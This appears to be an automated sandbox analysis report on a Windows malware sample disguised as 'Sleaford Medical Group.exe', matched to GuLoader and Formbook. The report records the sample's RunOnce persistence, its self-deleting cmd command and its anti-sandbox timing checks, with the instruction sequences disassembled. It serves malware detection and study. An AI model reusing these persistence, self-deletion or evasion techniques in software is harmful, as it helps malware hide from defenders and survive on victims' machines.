      Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001C.00000002.731169512.000000000333D000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000001C.00000002.736741312.0000000003CCF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/2@3/2
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4880:120:WilError_01
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile created: C:\Users\user\AppData\Local\Temp\~DF2124B0C9C8814512.TMPJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs'
      Source: Sleaford Medical Group.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Sleaford Medical Group.exeVirustotal: Detection: 47%
      Source: Sleaford Medical Group.exeReversingLabs: Detection: 10%
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeFile read: C:\Users\user\Desktop\Sleaford Medical Group.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Sleaford Medical Group.exe 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\Sleaford Medical Group.exe 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs'
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess created: C:\Users\user\Desktop\Sleaford Medical Group.exe 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
      Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000018.00000000.528248843.000000000E1C0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Sleaford Medical Group.exe, 00000016.00000003.497880207.000000001E1D0000.00000004.00000001.sdmp, help.exe, 0000001C.00000002.734476074.00000000038BF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Sleaford Medical Group.exe, help.exe
      Source: Binary string: help.pdbGCTL source: Sleaford Medical Group.exe, 00000016.00000002.558311091.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: help.pdb source: Sleaford Medical Group.exe, 00000016.00000002.558311091.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000018.00000000.528248843.000000000E1C0000.00000002.00000001.sdmp

      Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: Process Memory Space: Sleaford Medical Group.exe PID: 5356, type: MEMORY
Source: Yara match | File source: Process Memory Space: oversad.exe PID: 6316, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: Sleaford Medical Group.exe PID: 5356, type: MEMORY
Source: Yara match | File source: Process Memory Space: oversad.exe PID: 6316, type: MEMORY
Source: Sleaford Medical Group.exe | Static PE information: real checksum: 0x1de61 should be: 0x2872b
Source: oversad.exe.22.dr | Static PE information: real checksum: 0x1de61 should be: 0x2872b
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_0040566B push 80B1BCC2h; iretd
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_0040C272 push eax; retf 0040h
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_00402603 push 0000001Ch; ret
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_0040B41D push edi; iretd
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_00402434 push esp; iretd
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_0040583C push eax; ret
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_0040BCC5 push edi; iretd
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_0040C28C pushad ; retf 0040h
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_0040857A push edi; ret
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 0_2_0040C39C push 7C00700Ch; retf
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_1E3ED0D1 push ecx; ret
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00563DA9 push 0000002Dh; retn 0008h
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_0381D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02ED6AAA push ebx; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02ECE3A1 push edi; retf
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02EDE35B push esi; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02ED68DE push 79CB813Ch; retf
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02ED6999 push edx; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02EDCEC5 push eax; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02ECDF98 push cs; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02EDCF7C push eax; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02EDCF1B push eax; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02EDCF12 push eax; ret
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_02EC6DA1 push ebp; retf
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | File created: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe

      Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6 C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6 C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6

      Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEB
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\help.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00563AC4 InternetOpenA,InternetOpenUrlA,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562CA9
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562D5A
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562D02
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_005629FB
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562993
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562A7B
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_0056661B
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562AD1
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00563AC7 InternetOpenA,InternetOpenUrlA,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562AE5
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562AB2
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562B67
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00563B11 InternetOpenUrlA,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562B1D
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Code function: 22_2_00562BE4
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 000000000042616B second address: 00000000004253F5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, 00000539h 0x0000000f push esi 0x00000010 mov esi, A893C8D1h 0x00000015 cmp esi, A893C8D1h 0x0000001b jne 00007F08D0B0C1FBh 0x00000021 pop esi 0x00000022 mov ecx, dword ptr [ebp+1Ch] 0x00000025 mov edx, 8802EDACh 0x0000002a call 00007F08D0B10EABh 0x0000002f jmp 00007F08D0B11CCAh 0x00000031 nop 0x00000032 push esi 0x00000033 push edx 0x00000034 jmp 00007F08D0B11CCAh 0x00000036 test ch, ch 0x00000038 push ecx 0x00000039 cmp eax, 00000539h 0x0000003e jne 00007F08D0B11E08h 0x00000044 jmp 00007F08D0B11CCAh 0x00000046 pushad 0x00000047 mov edx, 000000C2h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000425EF7 second address: 0000000000425EF7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F08D0937E38h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F08D0937E4Ah 0x0000001f nop 0x00000020 cmp al, al 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007F08D0937DFBh 0x00000033 cmp cl, cl 0x00000035 cmp ah, bh 0x00000037 call 00007F08D0937E8Fh 0x0000003c call 00007F08D0937E48h 0x00000041 lfence 0x00000044 mov edx, dword ptr [7FFE0014h] 0x0000004a lfence 0x0000004d ret 0x0000004e mov esi, edx 0x00000050 pushad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000424202 second address: 0000000000424202 instructions:
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000560F5E second address: 0000000000560F5E instructions:
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000565BB0 second address: 00000000005639A3 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a retn 0010h 0x0000000d cmp edx, edx 0x0000000f push dword ptr [ebp+000000B4h] 0x00000015 pop dword ptr [ebp+00000134h] 0x0000001b jmp 00007F08D0B11CCAh 0x0000001d jmp 00007F08D0B11D00h 0x0000001f push dword ptr [ebp+68h] 0x00000022 push dword ptr [ebp+00000134h] 0x00000028 call 00007F08D0B142D5h 0x0000002d pushad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 00000000005639A3 second address: 00000000005639A3 instructions:
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000563C6D second address: 0000000000563CC2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push esi 0x0000000b mov esi, CDC9E0AFh 0x00000010 cmp esi, CDC9E0AFh 0x00000016 jne 00007F08D0B0E6FEh 0x0000001c pop esi 0x0000001d mov eax, ebp 0x0000001f add eax, 000000F0h 0x00000024 jmp 00007F08D0B11CCAh 0x00000026 test cx, cx 0x00000029 mov ebx, dword ptr [ebp+000000E4h] 0x0000002f cmp edx, edx 0x00000031 mov ecx, dword ptr [ebp+000000F4h] 0x00000037 pushad 0x00000038 mov ecx, 000000EBh 0x0000003d rdtsc
Tries to detect Any.run
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Sleaford Medical Group.exe, oversad.exe, 0000001A.00000002.730357636.0000000000420000.00000040.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000401C79 second address: 0000000000401C79 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 2Dh 0x00000005 cmp ebx, 06h 0x00000008 cmp edi, 02EAFF40h 0x0000000e movd mm1, ebx 0x00000011 movd mm1, ebx 0x00000014 paddusw xmm0, xmm3 0x00000018 fdivp st(6), st(0) 0x0000001a jmp 00007F08D0937E89h 0x0000001c movd mm1, ebx 0x0000001f movd mm1, ebx 0x00000022 jne 00007F08D0937D4Fh 0x00000028 inc edi 0x00000029 pslld mm5, 09h 0x0000002d fsubp st(1), st(0) 0x0000002f jmp 00007F08D0937E89h 0x00000031 cmp eax, 1Dh 0x00000034 cmp eax, 000000A3h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 000000000042616B second address: 00000000004253F5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, 00000539h 0x0000000f push esi 0x00000010 mov esi, A893C8D1h 0x00000015 cmp esi, A893C8D1h 0x0000001b jne 00007F08D0B0C1FBh 0x00000021 pop esi 0x00000022 mov ecx, dword ptr [ebp+1Ch] 0x00000025 mov edx, 8802EDACh 0x0000002a call 00007F08D0B10EABh 0x0000002f jmp 00007F08D0B11CCAh 0x00000031 nop 0x00000032 push esi 0x00000033 push edx 0x00000034 jmp 00007F08D0B11CCAh 0x00000036 test ch, ch 0x00000038 push ecx 0x00000039 cmp eax, 00000539h 0x0000003e jne 00007F08D0B11E08h 0x00000044 jmp 00007F08D0B11CCAh 0x00000046 pushad 0x00000047 mov edx, 000000C2h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000425EF7 second address: 0000000000425EF7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F08D0937E38h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F08D0937E4Ah 0x0000001f nop 0x00000020 cmp al, al 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007F08D0937DFBh 0x00000033 cmp cl, cl 0x00000035 cmp ah, bh 0x00000037 call 00007F08D0937E8Fh 0x0000003c call 00007F08D0937E48h 0x00000041 lfence 0x00000044 mov edx, dword ptr [7FFE0014h] 0x0000004a lfence 0x0000004d ret 0x0000004e mov esi, edx 0x00000050 pushad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000425F57 second address: 0000000000425F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F08D0B1225Ch 0x0000001d popad 0x0000001e call 00007F08D0B11DEBh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 00000000004205B7 second address: 00000000004253F5 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007F08D093BC3Bh 0x00000010 call 00007F08D093402Ah 0x00000015 jmp 00007F08D0937E4Ah 0x00000017 cmp ebx, edx 0x00000019 pop ecx 0x0000001a mov dword ptr [ebp+18h], ecx 0x0000001d cmp dh, dh 0x0000001f mov eax, 00000539h 0x00000024 mov edx, 60AF076Dh 0x00000029 call 00007F08D093CBCDh 0x0000002e jmp 00007F08D0937E4Ah 0x00000030 nop 0x00000031 push esi 0x00000032 push edx 0x00000033 jmp 00007F08D0937E4Ah 0x00000035 test ch, ch 0x00000037 push ecx 0x00000038 cmp eax, 00000539h 0x0000003d jne 00007F08D0937F88h 0x00000043 jmp 00007F08D0937E4Ah 0x00000045 pushad 0x00000046 mov edx, 000000C2h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000424202 second address: 0000000000424202 instructions:
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000565F57 second address: 0000000000565F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F08D09383DCh 0x0000001d popad 0x0000001e call 00007F08D0937F6Bh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 00000000005605B7 second address: 00000000005653F5 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007F08D0B15ABBh 0x00000010 call 00007F08D0B0DEAAh 0x00000015 jmp 00007F08D0B11CCAh 0x00000017 cmp ebx, edx 0x00000019 pop ecx 0x0000001a mov dword ptr [ebp+18h], ecx 0x0000001d cmp dh, dh 0x0000001f mov eax, 00000539h 0x00000024 mov edx, 60AF076Dh 0x00000029 call 00007F08D0B16A4Dh 0x0000002e jmp 00007F08D0B11CCAh 0x00000030 nop 0x00000031 push esi 0x00000032 push edx 0x00000033 jmp 00007F08D0B11CCAh 0x00000035 test ch, ch 0x00000037 push ecx 0x00000038 cmp eax, 00000539h 0x0000003d jne 00007F08D0B11E08h 0x00000043 jmp 00007F08D0B11CCAh 0x00000045 pushad 0x00000046 mov edx, 000000C2h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000560F5E second address: 0000000000560F5E instructions:
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000565BB0 second address: 00000000005639A3 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a retn 0010h 0x0000000d cmp edx, edx 0x0000000f push dword ptr [ebp+000000B4h] 0x00000015 pop dword ptr [ebp+00000134h] 0x0000001b jmp 00007F08D0B11CCAh 0x0000001d jmp 00007F08D0B11D00h 0x0000001f push dword ptr [ebp+68h] 0x00000022 push dword ptr [ebp+00000134h] 0x00000028 call 00007F08D0B142D5h 0x0000002d pushad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 00000000005639A3 second address: 00000000005639A3 instructions:
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000563C6D second address: 0000000000563CC2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push esi 0x0000000b mov esi, CDC9E0AFh 0x00000010 cmp esi, CDC9E0AFh 0x00000016 jne 00007F08D0B0E6FEh 0x0000001c pop esi 0x0000001d mov eax, ebp 0x0000001f add eax, 000000F0h 0x00000024 jmp 00007F08D0B11CCAh 0x00000026 test cx, cx 0x00000029 mov ebx, dword ptr [ebp+000000E4h] 0x0000002f cmp edx, edx 0x00000031 mov ecx, dword ptr [ebp+000000F4h] 0x00000037 pushad 0x00000038 mov ecx, 000000EBh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe | RDTSC instruction interceptor: First address: 0000000000401C79 second address: 0000000000401C79 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 2Dh 0x00000005 cmp ebx, 06h 0x00000008 cmp edi, 02EAFF40h 0x0000000e movd mm1, ebx 0x00000011 movd mm1, ebx 0x00000014 paddusw xmm0, xmm3 0x00000018 fdivp st(6), st(0) 0x0000001a jmp 00007F08D0937E89h 0x0000001c movd mm1, ebx 0x0000001f movd mm1, ebx 0x00000022 jne 00007F08D0937D4Fh 0x00000028 inc edi 0x00000029 pslld mm5, 09h 0x0000002d fsubp st(1), st(0) 0x0000002f jmp 00007F08D0937E89h 0x00000031 cmp eax, 1Dh 0x00000034 cmp eax, 000000A3h 0x00000039 rdtsc
Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 0000000002EC98E4 second address: 0000000002EC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002EC9B5E second address: 0000000002EC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_00401C31 rdtsc
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\explorer.exe TID: 7004Thread sleep time: -46000s >= -30000s
      Source: C:\Windows\SysWOW64\help.exe TID: 6336Thread sleep time: -40000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000018.00000000.523652219.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000018.00000000.523858105.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
